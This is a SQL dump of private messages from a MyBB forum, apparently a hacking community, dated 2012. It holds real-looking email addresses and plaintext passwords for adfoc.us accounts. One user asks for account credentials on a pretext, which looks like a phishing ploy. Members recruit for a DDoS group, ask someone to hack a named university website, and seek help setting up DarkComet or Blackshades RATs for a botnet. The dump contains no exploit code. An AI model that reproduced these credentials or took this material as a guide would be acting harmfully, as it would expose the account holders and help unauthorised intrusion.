`folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3848', '82', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Adfoc.us views', '0', '[quote=\'sirchamp\'] Hello I can boost your adfoc.us. For free! But you have to leave a vouch in the thread. Thanks. Send me your adfoc.us account details. I need the account details to see how much views you have and how much there are to go. I wont change any details. The only thing I will do is perhaps shrink a few more links so I can do the method faster. Send me the details over skype. thanks [/quote] Adfoc.us Info Login Email: iTzIpod@hotmail.com Password: Moneymaking', '1351370790', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3850', '2', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'XxTREYZxX\'] [quote=\'Apathy\'] [quote=\'XxTREYZxX\'] [quote=\'Apathy\'] [quote=\'XxTREYZxX\'] hey man whats happening me and you havent talked much so yeah whats happening [/quote] Nm exhausted from life. Going to bed soon you? [/quote] Home alone. and eating food aahha [/quote] Nice :P What type? [/quote] Those Sakata things :P [/quote] Never heard of it.', '1351387644', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3852', '100', '53', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Ddosers', '0', '[quote=\'sirchamp\'] Hello Can I join your group? I think I will be able to answer the questions. Thanks [/quote] Questions are: 1.) How long have you been doing networking? 2.) Whats a botnet? (noob proofing) 3.) How does the DDoS meathod \'Slowloris\' Work?', '1351399270', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3854', '53', '100', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: Ddosers', '0', '[quote=\'??zg???g????61\'] [quote=\'sirchamp\'] Hello Can I join your group? I think I will be able to answer the questions. Thanks [/quote] Questions are: 1.) How long have you been doing networking? 2.) Whats a botnet? (noob proofing) 3.) How does the DDoS meathod \'Slowloris\' Work? [/quote] 1. About a year. 2. A botnet is like a group of computers that you can use to attack connections. To get computers to your botnet you need to give them your virus file. 3. With slowloris you can take a website down with using very little bandwith. Slowloris keeps as many connections to the server open and holds them open as long as possible. I hope it\'s understandable. I have problems expressing myself in english. It\'s my second language :(', '1351410530', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3856', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Reply fast', '0', 'I\'m working on your thread but there is one mistake How much can you make with 10k views ?', '1351426255', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3858', '100', '53', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Ddosers', '0', '[quote=\'sirchamp\'] [quote=\'??zg???g????61\'] [quote=\'sirchamp\'] Hello Can I join your group? I think I will be able to answer the questions. Thanks [/quote] Questions are: 1.) How long have you been doing networking? 2.) Whats a botnet? (noob proofing) 3.) How does the DDoS meathod \'Slowloris\' Work? [/quote] 1. About a year. 2. A botnet is like a group of computers that you can use to attack connections. To get computers to your botnet you need to give them your virus file. 3. With slowloris you can take a website down with using very little bandwith. Slowloris keeps as many connections to the server open and holds them open as long as possible. I hope it\'s understandable. I have problems expressing myself in english. It\'s my second language :( [/quote] Awesome, your in. :D welcome.', '1351434608', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3860', '228', '2', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Hi', '0', 'Why don\'t you become a member of Marketers?', '1351444458', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3862', '53', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\'] I\'m working on your thread but there is one mistake How much can you make with 10k views ? [/quote] 30 dollars', '1351454565', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3865', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\'] Hi, I have noticed that you are starting to become active again on L33T Hacking. Do you want to become a member of coders again and if possible leader? [/quote] Hey. Yea i will be more active now, as i have nothing to do after school etc. I will gladely be a member of coders, but not a leader right now. I will be happy if i can become a Co of coders (or something) in the future. :) :cool:', '1351466215', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3868', '2', '228', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hi', '0', '[quote=\'VirtualLegend\'] Why don\'t you become a member of Marketers? [/quote] I may but I am quite busy at the moment. :P Possibly soon though.', '1351471851', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3870', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Reply fast', '0', 'What do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url] ', '1351526613', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3872', '53', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\'] What do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url] [/quote] Thanks sooo muuch <33 you. So nice. :D i FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^ Thanks a million.', '1351526929', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3875', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Reply fast', '0', '[quote=\'sirchamp\'] [quote=\'VirtualLegend\'] What do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url] [/quote] Thanks sooo muuch <33 you. So nice. :D i FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^ Thanks a million. [/quote] I\'m really glad that you love it Thanks bro What should i give to you to boost my adfoc.us Link: http://adfoc.us/938301 If you need help with anything just contact me ', '1351530760', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3877', '53', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\'] [quote=\'sirchamp\'] [quote=\'VirtualLegend\'] What do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url] [/quote] Thanks sooo muuch <33 you. So nice. :D i FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^ Thanks a million. [/quote] I\'m really glad that you love it Thanks bro What should i give to you to boost my adfoc.us Link: http://adfoc.us/938301 If you need help with anything just contact me [/quote] I need your adfoc,us login infos. You can change it to something simple. I need the access to make more links. I wont change anything', '1351531004', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3879', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Reply fast', '0', '[quote=\'sirchamp\'] [quote=\'VirtualLegend\'] [quote=\'sirchamp\'] [quote=\'VirtualLegend\'] What do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url] [/quote] Thanks sooo muuch <33 you. So nice. :D i FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^ Thanks a million. [/quote] I\'m really glad that you love it Thanks bro What should i give to you to boost my adfoc.us Link: http://adfoc.us/938301 If you need help with anything just contact me [/quote] I need your adfoc,us login infos. You can change it to something simple. I need the access to make more links. I wont change anything [/quote] e-mail: ielmessaoudi@unic-utrecht.nl Pass: sirchamp123', '1351531131', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3881', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Sup', '0', 'How long is it gonna take :P I can\'t wait :D Thanks for doing this your AWESOME', '1351535975', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3883', '61', '53', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Here it is', '0', 'I\'m not acting like i\'m better than everyone else. But if that\'s your choice and you want to argue you can. I deleted the argument off your thread because it\'s unprofessional on both our behaves. I don\'t know what i\'ve done to you to make you be a dick towards me but if you want to keep it up that\'s fine and your choice. ', '1351536383', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3952', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hey', '0', '[quote=\'t3h jok3r\'] [quote=\'XxTREYZxX\'] Hey man whats happening [/quote] 1. No gasoline for the next 3 days and my car is out of gas. 2. All subways and buses shut down. 3. Luckily my block is the only block with electricity which also means no fast food :( 4. 80% of the roads are blocked because either homes are broken or roads are full of trees and I mean tress that fell down. 5. I send a company to replace my PC because the speakers weren\'t working properly and they told me to come back tomorrow but since I can\'t do there so no computer for me to the next 4-6 days. My sibling has a computer but it\'s provided by their university so can\'t access LH as they keep logs. 6. Can\'t drink tap water as the mayor clearly said that do not drink tap water because due to their pipes being overfull they let the dirty water through so now I have to buy and drink bottle water. [/quote] Wow you are doing it hard i feel sorry for you brahh you will get there :((((', '1351736432', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3955', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hey', '0', '[quote=\'t3h jok3r\'] [quote=\'XxTREYZxX\'] [quote=\'t3h jok3r\'] [quote=\'XxTREYZxX\'] Hey man whats happening [/quote] 1. No gasoline for the next 3 days and my car is out of gas. 2. All subways and buses shut down. 3. Luckily my block is the only block with electricity which also means no fast food :( 4. 80% of the roads are blocked because either homes are broken or roads are full of trees and I mean tress that fell down. 5. I send a company to replace my PC because the speakers weren\'t working properly and they told me to come back tomorrow but since I can\'t do there so no computer for me to the next 4-6 days. My sibling has a computer but it\'s provided by their university so can\'t access LH as they keep logs. 6. Can\'t drink tap water as the mayor clearly said that do not drink tap water because due to their pipes being overfull they let the dirty water through so now I have to buy and drink bottle water. [/quote] Wow you are doing it hard i feel sorry for you brahh you will get there :(((( [/quote] Thanks and yeah my life sucks atm. Trying my best [/quote] man i dont know what to say atm', '1351737304', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3958', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: YouTube', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] The following video belongs to you. This video is the 2nd result you get when you type in l33t hacking or l33thacking on Google. I was wondering if you could update the URL on the video from .com to .net also fix the link on your adf.ly referral. [/quote] Fixed link I think. Not sure. [/quote] Actually if you don\'t mind can you take it down because it says \"l33thackingcom\" is our twitter but it\'s \"l33thackingnet\" now. [/quote] ._. okay...', '1351769135', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3960', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Don\'t handle the report', '0', '[quote=\'t3h jok3r\'] There\'s one unread reported post. Please do not take any action on it, I want to see if Apathy even does something when he gets a chance or not. [/quote] Alright will do.', '1351770850', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3962', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'sup', '0', 'Lol do you really know the method that sirchamp is using or are you just kidding?', '1351784687', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3966', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'??zg???g????61\'] [quote=\'t3h jok3r\'] [quote=\'??zg???g????61\'] [quote=\'t3h jok3r\'] Sup long time no chat. [/quote] Yeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything? [/quote] Np, everythings cool. The hurricane came by and thank god nothing happen to me or my family. Did it come to your side? [/quote] Yeah but we\'re all good [/quote] That\'s good. Did anything much happen to your area? [/quote] Some trees fell. Not much though. I heard new Jersey got hit HARD.', '1351791877', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3969', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: sup', '0', '[quote=\'VirtualLegend\'] Lol do you really know the method that sirchamp is using or are you just kidding? [/quote] Yeah I have it, Want it? idk if it\'s patched or not I haven\'t used it in like 2 days because I raped it for 120$ But I can send it to you if you want.', '1351794093', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3972', '257', '310', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"310\";}}', '2', 'HELLO', '0', 'Hello mate, you would wanna post a introduction.So every one can see who you are :P', '1351800007', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3975', '61', '194', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"194\";}}', '2', 'Gamers', '0', 'You\'ve been Accepted. Please give us some time to gather more members ', '1351818597', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3977', '54', '1', '54', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'mate', '0', 'i will not post in your forum before 11 of this month as i busy... hope you will understand.', '1351836028', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3981', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'hey', '0', 'hey JW is breshie banned and for what', '1351874514', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3983', '53', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey', '0', '[quote=\'XxTREYZxX\'] hey JW is breshie banned and for what [/quote] He backstabbed thejoker. ', '1351875457', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3985', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: hey', '0', '[quote=\'sirchamp\'] [quote=\'XxTREYZxX\'] hey JW is breshie banned and for what [/quote] He backstabbed thejoker. [/quote] Really by doing what', '1351875679', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3987', '53', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey', '0', '[quote=\'XxTREYZxX\'] [quote=\'sirchamp\'] [quote=\'XxTREYZxX\'] hey JW is breshie banned and for what [/quote] He backstabbed thejoker. [/quote] Really by doing what [/quote] Dont know... We shall find out in the next few hours :)', '1351876182', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3989', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: hey', '0', '[quote=\'sirchamp\'] [quote=\'XxTREYZxX\'] [quote=\'sirchamp\'] [quote=\'XxTREYZxX\'] hey JW is breshie banned and for what [/quote] He backstabbed thejoker. [/quote] Really by doing what [/quote] Dont know... We shall find out in the next few hours :) [/quote] who would do that do a great admin', '1351876335', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3992', '313', '257', '313', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Pyrox', '0', 'Hey its me pyrox', '1351876504', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3994', '257', '313', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"313\";}}', '2', 'Re: Pyrox', '0', '[quote=\'LSD\'] Hey its me pyrox [/quote] Hello and welcome ', '1351876711', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3996', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'My rep', '0', 'hello i see you are viewing my rep aahhah lol', '1351877352', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3998', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Fuuuuuu', '0', 'Everyone knows what earn\'t is it\'s like say if you earn money .But your asking someone else.So earn\'t. It\'s that simple so yeah. Thats not LQ. Everything that you say i as mean,You say nothing nice about me. I have been very nice to you.', '1351888323', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4000', '82', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: Fuuuuuu', '0', '[quote=\'XxTREYZxX\'] Everyone knows what earn\'t is it\'s like say if you earn money .But your asking someone else.So earn\'t. It\'s that simple so yeah. Thats not LQ. Everything that you say i as mean,You say nothing nice about me. I have been very nice to you. [/quote] Sir, you said FUUU to me.. -.- I don\'t see what you\'re trying to say. Earn\'t isn\'t a word. Earned is. K? Get your facts straight.', '1351890691', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4002', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Fuuuuuu', '0', '[quote=\'iTzIpod\'] [quote=\'XxTREYZxX\'] Everyone knows what earn\'t is it\'s like say if you earn money .But your asking someone else.So earn\'t. It\'s that simple so yeah. Thats not LQ. Everything that you say i as mean,You say nothing nice about me. I have been very nice to you. [/quote] Sir, you said FUUU to me.. -.- I don\'t see what you\'re trying to say. Earn\'t isn\'t a word. Earned is. K? Get your facts straight. [/quote] You know what i not going to bother :/', '1351891056', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4013', '319', '223', '319', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"223\";}}', '2', 'favor sir', '0', 'hello starz, i have a favor to ask you. can you try to hack this site >> wmsu.edu.ph i want to know if the site is hackable. thanks :)', '1352020155', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4015', '160', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Hey Guys', '0', '[quote=\'Timmy\'] [quote=\'Jacob\'] Do you want to help me set up the RAT, and build a BotNet? [/quote] Sure what RAT are you using? [/quote] Any, DarkComet Or Black shades', '1352032118', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4017', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for advert', '0', '[quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] [quote=\'t3h jok3r\'] I know you have a busy schedule but I really need help. I need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive. The size should be 700x90 or anything smaller. Thanks a bunch. [/quote] can this wait 1-2 days? I\'m really busy latetly :/ [/quote] yeah sure. [/quote] what slogan would you prefer? I\'m really bad to pick slogans :/', '1352033842', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4020', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for advert', '0', 'no idea if you like it but here it goes [img]http://i.imgur.com/lW5fi.gif[/img] I can add a slogan animated aswell and then Join us now or something, I just don\'t know what text shall I add. out of ideas here. and btw you like the background?', '1352034908', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4028', '324', '1', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\'] Hi, Firstly welcome to L33T Hacking. It\'s great to have you on LH. Secondly, I highly appreciate your contribution but L33T Hacking is not a post here and PM me site. If possible can you please change your minecraft accounts from post here and PM me or just post here and use the lock mycode. What the lock mycode does is hides the content til someone posts. Only the poster can then view the content. [/quote] It is post here and I will pm you. ', '1352181754', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4032', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for advert', '0', '[quote=\'t3h jok3r\'] It looks awesome. I first saw this when I was in school and when I saw this I said wow and the girl next to me was like that looks sexy. [/quote] glad you like it :)', '1352191790', '0', '1', '0', '1', '0', '0', '0'); 